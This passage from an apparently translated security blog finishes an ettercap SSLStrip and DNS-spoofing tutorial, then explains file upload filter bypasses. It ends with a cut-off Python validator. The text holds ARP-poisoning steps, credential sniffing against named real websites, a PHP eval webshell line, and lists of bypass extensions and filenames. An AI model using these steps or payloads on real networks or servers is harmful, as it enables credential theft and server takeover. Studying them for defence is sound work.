<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402191100289.png" alt="image-20200402191100289"></p>
<p>As you can see, the page shows no insecure-connection warning of any kind; the original HTTPS connection has simply been replaced with HTTP, and to make it more convincing the page's favicon has been swapped for a silver padlock. A fake is still a fake, though: no certificate information is available, and if the user types <code>https://</code> in front of the address the page will not load. sslstrip is therefore not a universal attack.</p>
</blockquote>
<h3 id="使用ettercap对目标主机进行arp攻击,并且开始嗅探密码。"><a href="#使用ettercap对目标主机进行arp攻击,并且开始嗅探密码。" class="headerlink" title="Use ettercap to ARP-poison the target and sniff passwords"></a>Use ettercap to ARP-poison the target and sniff passwords</h3><blockquote>
<p>Sniff passwords from the terminal: <code>ettercap -Tq -i eth0</code></p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">-P  use a plugin</span><br><span class="line">-T  text-only interface</span><br><span class="line">-q  quiet mode (do not print packet contents)</span><br><span class="line">-M  perform a MITM attack (for ARP poisoning: -M arp:remote)</span><br></pre></td></tr></table></figure>
</blockquote>
<p>We will use ettercap's GTK+ graphical interface: <code>ettercap -G</code></p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn6xo9ynj30me0ehtaf.jpg" alt="1"></p>
<p>Choose Sniff, then Unified sniffing, and select the interface: eth0 (eth0 here; pick the one that matches your setup).</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005253674-1007015553.png" alt="img"></p>
<p>Then Hosts, Scan for hosts, Hosts list.</p>
<p>Select our target host (192.168.40.130) and click "Add to Target 1"; select the gateway and click "Add to Target 2".</p>
<p>Then click Mitm, ARP poisoning, and tick "Sniff remote connections".</p>
<p>Then Start, Start sniffing.</p>
<p>View, Connections shows the IPs, ports, protocols and byte counts of the victim's connections.</p>
<p>View, Profiles shows the hosts the victim has visited; the pane below gives a clearer view of what was accessed.</p>
<p>Double-clicking an entry opens its profile details, i.e. the specifics of the visit.</p>
<p>If the victim now logs in to a site, we can capture the username and password.</p>
<p>Here is a username and password captured just now. This site does nothing to protect the password, and it shows up in clear text.<br><a href="http://ww1.sinaimg.cn/large/006DGX4tly1forn7tt3plj306h00g3ya.jpg"><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn7tt3plj306h00g3ya.jpg" alt="3"></a></p>
<p>This one is from another site, which obfuscates the password before sending it.<br><a href="http://ww1.sinaimg.cn/large/006DGX4tly1forn8hy09dj30l2015747.jpg"><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn8hy09dj30l2015747.jpg" alt="4"></a></p>
<p>Tip: a site that is HTTPS throughout usually takes other precautions as well, such as hashing or encrypting the password in JavaScript before it leaves the browser. Even after downgrading HTTPS to HTTP and capturing the login, what you get is that transformed value rather than the password itself, although a value the server accepts as-is can still be replayed.</p>
<h4 id="测试网址"><a href="#测试网址" class="headerlink" title="Test sites"></a>Test sites</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://www.freemojo.com            // HTTP, password sent in clear text</span><br><span class="line">http://bbs.ylnet.com.cn/forum.php  // HTTP, password obfuscated client-side</span><br><span class="line">http://www.discuz.net/forum.php    // HTTPS, password sent without obfuscation</span><br></pre></td></tr></table></figure>
<h3 id="Dns欺骗"><a href="#Dns欺骗" class="headerlink" title="DNS spoofing"></a>DNS spoofing</h3><p><code>leafpad /etc/ettercap/etter.dns</code></p>
<p>Next to the microsoft example entries, add:</p>
<p><code>www.baidu.com A 192.168.40.132</code></p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231357902.png" alt="image-20200402231357902"></p>
<p>Run <code>ettercap -G</code> to open the graphical interface.</p>
<p>Repeat the ARP spoofing steps above, but before "Start sniffing" load a plugin:</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005436537-613190724.png" alt="img"></p>
<p>Double-click dns_spoof to enable it</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005442442-1221575293.png" alt="img"></p>
<p>With sniffing started, ping baidu from the target machine:</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231259745.png" alt="image-20200402231259745"></p>
<p>The spoof works. If 192.168.40.132 served a phishing page instead, the victim's username and password could be captured.</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231157009.png" alt="image-20200402231157009"></p>
<p>A final reminder: be very careful when connecting to public Wi-Fi!</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="References"></a>References</h2><p> <a href="https://www.jianshu.com/p/983d43b4ba1e">How to carry out a complete SSLStrip attack</a></p>
<p><a href="https://www.cnblogs.com/paperpen/p/10810690.html">ARP spoofing with the ettercap graphical interface</a></p>
<p><a href="https://www.jianshu.com/p/bbf50dace855">ARP attacks (Arpspoof)</a></p>
<p><a href="https://blog.csdn.net/li_101357/article/details/78416813">Linux IP forwarding settings: ip_forward and route forwarding</a></p>
<p><a href="https://blog.csdn.net/kuiguowei/article/details/79070945">Capturing HTTP and HTTPS credentials, and LAN DNS spoofing with ettercap</a></p>
<p><a href="https://www.bingyublog.com/2018/02/23/%E4%BD%BF%E7%94%A8ssltrip%E7%AA%81%E7%A0%B4ssl%E5%8A%A0%E5%AF%86%E6%88%AA%E8%8E%B7%E5%AF%86%E7%A0%81/">Breaking SSL with sslstrip to capture passwords</a></p>
<p><a href="https://moxie.org/software/sslstrip/">sslstrip</a></p>
<p><a href="https://www.freebuf.com/articles/web/5929.html">Using sslstrip and ettercap to break SSL and sniff passwords</a></p>
<p><a href="https://www.linuxde.net/2011/11/2522.html">Demonstrating and defending against man-in-the-middle attacks on SSL</a></p>
<p><a href="https://tools.kali.org/information-gathering/sslstrip">sslstrip Package Description</a></p>
]]></content>
<categories>
<category>kali</category>
</categories>
<tags>
<tag>SSLstrip</tag>
<tag>ARP</tag>
<tag>kali</tag>
</tags>
</entry>
<entry>
<title>Summary of file upload bypass techniques</title>
<url>/2020/08/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/</url>
<content><![CDATA[<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582510679-150193-upload1.png" alt="img"></p>
<hr>
<ol>
<li><strong>Client-side validation</strong><br>1.1 Edit the client-side JavaScript to remove the check<br>1.2 Intercept the request and change the extension<br>1.3 Disable JavaScript in the browser</li>
<li><strong>Server-side validation</strong><br>2.1 <strong>MIME-based checks</strong><br>2.1.1 Checking the Content-Type header<br>2.1.2 Changing the file extension<br>2.2 <strong>Extension-based bypasses</strong><br>2.2.1 <strong>Blacklist bypasses</strong><br>2.2.1.1 <strong>Windows servers</strong><br>2.2.1.1.1 Use another executable extension that is not blocked<br>2.2.1.1.2 Mixed case<br>2.2.1.1.3 Doubled extension<br>2.2.1.1.4 Trailing dot<br>2.2.1.1.5 Trailing space<br>2.2.1.1.6 Trailing ::$DATA<br>2.2.1.1.7 Null-byte truncation<br>2.2.1.1.8 Uploading a .access file<br>2.2.1.1.9 Race condition<br>2.2.1.1.10 Image trojan plus a parsing vulnerability<br>2.2.1.2 <strong>Linux servers</strong><br>2.2.1.2.1 Use another executable extension that is not blocked<br>2.2.1.2.2 Doubled extension<br>2.2.1.2.3 Null-byte truncation<br>2.2.1.2.4 Uploading a .access file<br>2.2.1.2.5 Race condition<br>2.2.1.2.6 Image trojan plus a parsing vulnerability<br>2.2.2 <strong>Whitelist bypasses</strong><br>2.2.2.1 Image trojan plus a parsing vulnerability<br>2.2.2.2 Uploading a .access file<br>2.3 <strong>Content-based checks</strong><br>2.3.1 Image trojan plus a parsing vulnerability</li>
</ol>
<hr>
<h2 id="1-前端验证"><a href="#1-前端验证" class="headerlink" title="1. Client-side validation"></a>1. Client-side validation</h2><p>Client-side validation is defined in contrast to server-side validation: before the upload actually starts, a script (typically JavaScript) applies a whitelist or blacklist to the file. If the file matches the rules it is sent to the server; if not, the upload is refused.</p>
<p>Typical JavaScript that restricts upload extensions:</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><script language=<span class="string">"JavaScript"</span> type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">check</span>(<span class="params"></span>) {</span><br><span class="line"> <span class="keyword">var</span> aa = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">"userfile"</span>).<span class="property">value</span>.<span class="title function_">toLowerCase</span>().<span class="title function_">split</span>(<span class="string">'.'</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable language_">document</span>.<span class="property">form1</span>.<span class="property">userfile</span>.<span class="property">value</span> == <span class="string">""</span>) {</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">'图片不能为空!'</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'gif'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'jpg'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'bmp'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'png'</span> || aa[aa.<span class="property">length</span> - <span class="number">1</span>] == <span class="string">'jpeg'</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">var</span> imagSize = 
<span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">"userfile"</span>).<span class="property">files</span>[<span class="number">0</span>].<span class="property">size</span>;</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"图片大小:"</span> + imagSize + <span class="string">"B"</span>)</span><br><span class="line"> <span class="keyword">if</span>(imagSize < <span class="number">1024</span> * <span class="number">1024</span> * <span class="number">3</span>)</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">"图片大小在3M以内,为:"</span> + imagSize / (<span class="number">1024</span> * <span class="number">1024</span>) + <span class="string">"M"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="title function_">alert</span>(<span class="string">'请选择格式为*.jpg、*.gif、*.bmp、*.png、*.jpeg 的图片'</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></script></span><br></pre></td></tr></table></figure>
<h2 id="1-1-修改前端-javascript-文件将限制代码去掉"><a href="#1-1-修改前端-javascript-文件将限制代码去掉" class="headerlink" title="1.1 Edit the client-side JavaScript to remove the check"></a>1.1 Edit the client-side JavaScript to remove the check</h2><p>The JavaScript filter runs in the browser, which means the client can change it. Press F12 in the browser, locate the check in the page source, and edit it out.</p>
<h2 id="1-2-传参过程中抓包修改后缀"><a href="#1-2-传参过程中抓包修改后缀" class="headerlink" title="1.2 Intercept the request and change the extension"></a>1.2 Intercept the request and change the extension</h2><p>Alternatively, leave the JavaScript alone: prepare a simple PHP webshell, rename it with a .png extension so it passes the JavaScript check, start the upload, and intercept the request with Burp Suite (at this point the file has passed the client-side check and is about to be sent to the server). Change the extension back to .php in the intercepted request, and the PHP webshell is uploaded, bypassing the client-side check.</p>
<blockquote>
<p><strong>Webshell</strong><br>A webshell is a command-execution environment that exists as a web page file (asp, php, jsp, cgi and so on); it can also be called a web backdoor. After breaking into a site, an attacker typically mixes an asp or php backdoor file in with the legitimate pages in the server's web directory, then opens the backdoor in a browser to get a command-execution environment and thereby control the web server.<br>As the name says, "web" means the server must expose a web service, and "shell" means obtaining some degree of control over the server. A webshell is often described as the degree of access an intruder obtains to a web server through its web port. Because webshells mostly take the form of dynamic scripts, some people call them website backdoor tools.<br>—— From <a href="https://baike.baidu.com/item/WEBSHELL">Baidu Baike</a></p>
</blockquote>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582511932-510797-upload1-0-20200726140013458.png" alt="img"></p>
<h2 id="1-3-前端禁用-javascript-脚本"><a href="#1-3-前端禁用-javascript-脚本" class="headerlink" title="1.3 Disable JavaScript in the browser"></a>1.3 Disable JavaScript in the browser</h2><p>Since the check is client-side JavaScript that we can already modify, and if editing it is inconvenient, we can simply disable JavaScript entirely. That removes the restriction without stopping the upload from going through.</p>
<h2 id="2-后端验证"><a href="#2-后端验证" class="headerlink" title="2. Server-side validation"></a>2. Server-side validation</h2><p>Server-side means the server itself: after the file arrives, the server checks whether it meets the rules, keeping it if so and deleting it if not.</p>
<h2 id="2-1-基于-MIME-校验"><a href="#2-1-基于-MIME-校验" class="headerlink" title="2.1 MIME-based checks"></a>2.1 MIME-based checks</h2><p><strong>What is MIME?</strong></p>
<blockquote>
<p><strong>MIME and MIME mail</strong></p>
<p>MIME stands for "Multipurpose Internet Mail Extensions". It is a widely used e-mail specification whose core is defined in RFC 2045-2049.</p>
<p>A MIME message is accordingly an e-mail message that follows the MIME specification, or that is encoded according to it.</p>
<p>Before MIME, RFC 822 mail could carry only plain ASCII text, and including binary files, sound or animation in a message was very hard. MIME provides a way to attach files in many different encodings, making up for the shortcomings of the original format. It is no longer just a mail encoding: MIME is now part of the HTTP standard.<br>MIME (Multipurpose Internet Mail Extensions) is the Internet standard for describing the content type of a message.</p>
</blockquote>
<p><strong>MIME types in brief:</strong><br>A MIME message can contain text, images, audio, video and other application-specific data.<br>The official MIME specifications are published by the Internet Engineering Task Force (IETF) in the following documents:</p>
<ul>
<li><a href="http://www.rfc-editor.org/rfc/rfc822.txt">RFC-822</a> Standard for ARPA Internet text messages</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2045.txt">RFC-2045</a> MIME Part 1: Format of Internet Message Bodies</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2046.txt">RFC-2046</a> MIME Part 2: Media Types</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2047.txt">RFC-2047</a> MIME Part 3: Header Extensions for Non-ASCII Text</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2048.txt">RFC-2048</a> MIME Part 4: Registration Procedures</li>
<li><a href="http://www.rfc-editor.org/rfc/rfc2049.txt">RFC-2049</a> MIME Part 5: Conformance Criteria and Examples</li>
</ul>
<p><strong>Common MIME types:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">HTML document            .html          text/html</span><br><span class="line">XML document             .xml           text/xml</span><br><span class="line">XHTML document           .xhtml         application/xhtml+xml</span><br><span class="line">Plain text               .txt           text/plain</span><br><span class="line">RTF text                 .rtf           application/rtf</span><br><span class="line">PDF document             .pdf           application/pdf</span><br><span class="line">Microsoft Word document  .doc           application/msword</span><br><span class="line">PNG image                .png           image/png</span><br><span class="line">GIF image                .gif           image/gif</span><br><span class="line">JPEG image               .jpeg,.jpg     image/jpeg</span><br><span class="line">AU sound file            .au            audio/basic</span><br><span class="line">MIDI music file          .mid,.midi     audio/midi,audio/x-midi</span><br><span class="line">RealAudio music file     .ra,.ram       audio/x-pn-realaudio</span><br><span class="line">MPEG file                .mpg,.mpeg     video/mpeg</span><br><span class="line">AVI file                 .avi           video/x-msvideo</span><br><span class="line">GZIP file                .gz            application/x-gzip</span><br><span class="line">TAR file                 .tar           application/x-tar</span><br></pre></td></tr></table></figure>
<p>A full list of MIME types: <a href="https://www.w3school.com.cn/media/media_mimeref.asp">https://www.w3school.com.cn/media/media_mimeref.asp</a></p>
<h2 id="2-1-1-校验-content-type-请求头"><a href="#2-1-1-校验-content-type-请求头" class="headerlink" title="2.1.1 Checking the Content-Type header"></a>2.1.1 Checking the Content-Type header</h2><p>Here the server decides whether to accept the upload by matching the MIME type sent with it. Below is part of a PHP upload handler that relies on the Content-Type header:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'type'</span>] != <span class="string">"image/gif"</span>) <span class="comment"># reject anything whose declared type is not image/gif; this value comes straight from the client's Content-Type header</span></span><br><span class="line">{ </span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Sorry, we only allow uploading GIF images"</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$uploaddir</span> = <span class="string">'uploads/'</span>;</span><br><span class="line"><span class="variable">$uploadfile</span> = <span class="variable">$uploaddir</span> . <span class="title function_ invoke__">basename</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'name'</span>]);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$uploadfile</span>))</span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"File is valid, and was successfully uploaded.\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"File uploading failed.\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Code like this accepts only image/gif, i.e. GIF files. Intercept the upload and change the MIME type in the request to <code>image/gif</code> and the upload succeeds: the <code>type</code> field is taken from the client's Content-Type header, so the server is trusting a value the attacker controls.</p>
<h2 id="2-1-2-修改文件后缀"><a href="#2-1-2-修改文件后缀" class="headerlink" title="2.1.2 Changing the file extension"></a>2.1.2 Changing the file extension</h2><p>Same principle, different place in the intercepted request: here you change the filename's extension instead.</p>
<h2 id="2-2-基于后缀绕过"><a href="#2-2-基于后缀绕过" class="headerlink" title="2.2 Extension-based bypasses"></a>2.2 Extension-based bypasses</h2><p>The easiest type to understand: any extension the upload point fails to restrict can be uploaded.<br>A few common candidates:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3"</span><br></pre></td></tr></table></figure>
<p>When testing an upload point, if even one of these has been overlooked we can upload a shell.</p>
<p>To find out which extensions are not blocked, use Burp Suite to try them in bulk.</p>
<p>First send any upload request to Intruder:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582609077-866053-upload-labs6-3.png" alt="img"><br>then add the following payloads and start the attack</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">php</span><br><span class="line">php7</span><br><span class="line">php5</span><br><span class="line">php4</span><br><span class="line">php3</span><br><span class="line">php2</span><br><span class="line">php1</span><br><span class="line">html</span><br><span class="line">htm</span><br><span class="line">phtml</span><br><span class="line">pHp</span><br><span class="line">Php</span><br><span class="line">phP</span><br><span class="line">pHp5</span><br><span class="line">pHp4</span><br><span class="line">pHp3</span><br><span class="line">pHp2</span><br><span class="line">pHp1</span><br></pre></td></tr></table></figure>
<p>Every request except the one with a response length of 5299 uploaded successfully. Knowing which extensions get through, we can build our shell accordingly.<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582609253-89688-upload-labs6-4.png" alt="img"></p>
<p>That is how to determine which extensions can be uploaded before crafting the shell.</p>
<h2 id="2-2-1-黑名单验证绕过"><a href="#2-2-1-黑名单验证绕过" class="headerlink" title="2.2.1 Blacklist bypasses"></a>2.2.1 Blacklist bypasses</h2><blockquote>
<p><strong>Blacklist and whitelist</strong><br>These refer to how the upload point restricts files. A blacklist rejects only the xxx formats it lists; anything else is accepted and stored on the server. A whitelist accepts only the yyy formats it lists; anything else is rejected.</p>
</blockquote>
<h2 id="2-2-1-1-针对-windows-系统绕过"><a href="#2-2-1-1-针对-windows-系统绕过" class="headerlink" title="2.2.1.1 Windows servers"></a>2.2.1.1 Windows servers</h2><p>The server behind an upload point may run Windows or Linux, and each operating system offers different bypasses. We start with Windows.</p>
<h2 id="2-2-1-1-1-使用其他可执行并且未限制的后缀名"><a href="#2-2-1-1-1-使用其他可执行并且未限制的后缀名" class="headerlink" title="2.2.1.1.1 Use another executable extension that is not blocked"></a>2.2.1.1.1 Use another executable extension that is not blocked</h2><p>The idea is simply "upload whatever extension is not blocked": use the Burp Suite method above to find which extensions get through, then build the shell accordingly.</p>
<h2 id="2-2-1-1-2-大小写混合绕过"><a href="#2-2-1-1-2-大小写混合绕过" class="headerlink" title="2.2.1.1.2 Mixed case"></a>2.2.1.1.2 Mixed case</h2><p>Windows filenames are case-insensitive, so a file is handled the same whatever the case of its name. If a blacklist blocks x.php, upload x.Php instead: on a Windows server it is still treated as a PHP file when executed.</p>
<h2 id="2-2-1-1-3-文件名双写绕过"><a href="#2-2-1-1-3-文件名双写绕过" class="headerlink" title="2.2.1.1.3 Doubled extension"></a>2.2.1.1.3 Doubled extension</h2><p>Take a filter like this, which deletes the blacklisted extensions from the name:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br></pre></td></tr></table></figure>
<p>Upload x.pphphp: the single replacement removes the inner "php" and the remaining name is x.php.</p>
<h2 id="2-2-1-1-4-末尾添加-绕过"><a href="#2-2-1-1-4-末尾添加-绕过" class="headerlink" title="2.2.1.1.4 Trailing dot"></a>2.2.1.1.4 Trailing dot</h2><p>In some environments x.php. bypasses the check: when the file is saved on a Windows server, Windows strips the trailing dot, so the check is bypassed and the stored file is x.php. (A trailing dot can be combined with doubling or mixed case, but only on Windows.)</p>
<h2 id="2-2-1-1-5-末尾添加空格绕过"><a href="#2-2-1-1-5-末尾添加空格绕过" class="headerlink" title="2.2.1.1.5 Trailing space"></a>2.2.1.1.5 Trailing space</h2><p>Intercept the upload with Burp Suite and add a space at the end of the filename; Windows strips it when saving the file.<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582610313-719923-upload-labs7-2-20200726140000055.png" alt="img"></p>
<h2 id="2-2-1-1-6-末尾添加-DATA-绕过"><a href="#2-2-1-1-6-末尾添加-DATA-绕过" class="headerlink" title="2.2.1.1.6 Trailing ::$DATA"></a>2.2.1.1.6 Trailing ::$DATA</h2><blockquote>
<p><strong>Windows ::$DATA alternate data stream</strong><br>The NTFS file system includes support for alternate data streams. This is not a well known feature and was included, primarily, to provide compatibility with files in the Macintosh file system. Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called ::$DATA.</p>
</blockquote>
<p>In short, ::$DATA is a feature of Windows' NTFS file system: appending it to a filename refers to the file's default data stream, so the file actually created has the name without ::$DATA, and the blacklist is bypassed.</p>
<blockquote>
<p><strong>NTFS</strong><br>NTFS (New Technology File System) is a proprietary file system developed by Microsoft; starting with Windows NT 3.1 it has been the standard file system of the Windows NT family.</p>
<p>NTFS replaced FAT (File Allocation Table) and HPFS (High Performance File System) with a series of improvements: better metadata support, more advanced data structures for performance, reliability and disk-space utilisation, and additional features such as access control lists (ACLs) and file system journaling.</p>
</blockquote>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582686434-63469-upload-labs9-2-20200726135957724.png" alt="img"></p>
<h2 id="2-2-1-1-7-00截断上传"><a href="#2-2-1-1-7-00截断上传" class="headerlink" title="2.2.1.1.7 Null-byte truncation"></a>2.2.1.1.7 Null-byte truncation</h2><blockquote>
<p><strong>Null-byte truncation</strong><br>Whether written as 0x00 or %00, once decoded both are the same thing: chr(0).<br>chr() is a function that returns the character for a given code: the argument is an ASCII code and the return value is a one-character string.</p>
<p>chr(0) is then easy to understand: in the ASCII table, codes 0-127 each map to a character, and 0 is the NUL (null) character. That empty character is the key to truncation: when a string contains it, everything after it is discarded at parse time.<br>This commonly shows up in ASP programs, in PHP before 5.3.4, and in JSP.<br>So the principle is to insert a null character (not a space) into the extension, which causes the rest to be dropped and the check to be bypassed. For example, inserting one into 1.php.jpg to give 1.php[0x00].jpg leaves just 1.php after parsing. How do you insert it? Usually you intercept the request in Burp, put a space in the filename, find that space's hex code "20" in the Hex view, and change it to 00 (hex 00, decimal 0). The space is purely a marker to locate the position; any character would do, but a space is distinctive and easy to find in the hex view.</p>
</blockquote>
<p>In PHP, null-byte truncation requires both of the following:</p>
<ul>
<li>PHP version below 5.3.4</li>
<li>magic_quotes_gpc set to Off</li>
</ul>
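<p>The filename tricks in 2.2.1.1.2 to 2.2.1.1.7 all work for the same reason: the server compares the name the client sent, while the filesystem stores something else. As an added example (not from the original post, and in Python rather than the PHP the post discusses), the script below normalises a filename the way Windows/NTFS and null-byte truncation would, shows the weak blacklist check each trick slips past, and beside it the allow-list check on the normalised name that catches them, with a magic-byte sniff in place of the client-controlled Content-Type from 2.1.1. <code>DENY</code>, <code>ALLOW</code>, <code>MAGIC</code>, the webshell body and the filenames are all constructed for the example.</p>

```python
DENY = {".php", ".php3", ".php4", ".php5", ".phtml", ".htaccess"}   # the weak check's list
ALLOW = {".gif", ".jpg", ".jpeg", ".png"}                          # what we are willing to store
CANONICAL = {".jpeg": ".jpg"}
MAGIC = {                                                          # leading bytes -> image type
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
}


def normalize(name):
    """Reduce a client-supplied filename to what Windows/NTFS (and a PHP build
    affected by null-byte truncation) would actually store on disk."""
    name = name.split("\x00", 1)[0]                      # 2.2.1.1.7: everything after NUL is lost
    name = name.replace("\\", "/").rsplit("/", 1)[-1]    # drop any directory part
    upper = name.upper()
    if "::$DATA" in upper:                               # 2.2.1.1.6: default NTFS data stream
        name = name[: upper.index("::$DATA")]
    return name.rstrip(". ")                             # 2.2.1.1.4/5: trailing dots and spaces vanish


def extension(name):
    """Lower-cased extension of the stored name (2.2.1.1.2: case must not matter)."""
    if "." not in name:
        return ""
    if name.startswith(".") and name.count(".") == 1:    # names like .htaccess
        return name.lower()
    return "." + name.rsplit(".", 1)[1].lower()


def blacklist_check(raw_name):
    """The weak server-side check the sections above defeat: it looks at the
    raw suffix, case-sensitively, before the filesystem has normalised it."""
    suffix = "." + raw_name.rsplit(".", 1)[1] if "." in raw_name else ""
    return suffix not in DENY


def validate_upload(raw_name, content_type, data):
    """Allow-list check on the normalised name plus a magic-byte sniff.
    content_type is attacker-controlled (section 2.1.1) and is never trusted."""
    stored = normalize(raw_name)
    ext = extension(stored)
    if ext not in ALLOW:
        return False, f"extension {ext!r} not allowed (would be stored as {stored!r})"
    sniffed = next((kind for magic, kind in MAGIC.items() if data.startswith(magic)), None)
    if sniffed is None:
        return False, "content does not start with an image signature"
    if CANONICAL.get(ext, ext) != sniffed:
        return False, f"name says {ext} but content looks like {sniffed}"
    return True, stored


# Constructed inputs: a generic PHP webshell body and the filenames from the sections above.
PHP_PAYLOAD = b"<?php @eval($_POST['cmd']); ?>"
BYPASS_NAMES = [
    "shell.Php",             # 2.2.1.1.2 mixed case
    "shell.php.",            # 2.2.1.1.4 trailing dot
    "shell.php ",            # 2.2.1.1.5 trailing space
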